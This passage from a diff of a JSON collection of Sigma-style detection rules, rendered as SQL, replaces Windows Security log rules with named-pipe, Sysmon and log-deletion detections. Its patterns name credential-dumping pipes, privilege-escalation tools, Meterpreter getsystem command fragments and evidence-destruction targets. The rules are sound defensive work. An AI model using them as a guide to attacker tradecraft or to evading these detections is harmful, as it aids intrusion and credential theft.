"41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "User using a disabled account" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_reasons.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "User Logoff Event", - "id": "0badd08f-c6a3-4630-90d3-6875cca440be", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "status": "experimental", - "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", - "author": "frack113", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_user_logoff.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "title": "PsExec Default Named Pipe", + "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\'" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event 
Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability", - "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject", - "author": "Orlinum , BlueDefenZer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator 
activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "WMI Persistence - Security", - "id": 
"f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "status": "experimental", - "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": 
"win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + }, + { + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "falsepositives": [ + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration 
with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1039" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR 
RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE EventID = '27'" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.impact", "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Legitimate usage of SDelete" + "There are no known false positives at this time" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Sysmon Configuration Modification", + "id": 
"1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Add or Remove Computer from DC", - "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "author": "frack113", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_add_remove_computer.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Failed Code Integrity Checks", - "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "status": "stable", - "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. 
This could be a sign of tampered binaries.", - "author": "Thomas Patzke", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "status": "experimental", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.001" + "attack.t1070" ], "falsepositives": [ - "Disk device errors" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" ], - "filename": "win_security_susp_codeintegrity_check_failure.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "During uninstallation of the IIS service", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT 
* FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "Scheduled Task Deletion", - "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "status": "experimental", - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "author": "David Strassegger, Tim Shelton", + "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", + "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Software installation" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scheduled_task_deletion.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "TeamViewer Log File Deleted", + "id": "b1decb61-ed83-4339-8e95-53ea51901720", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN 
('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "file_delete_win_delete_teamviewer_logs.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - 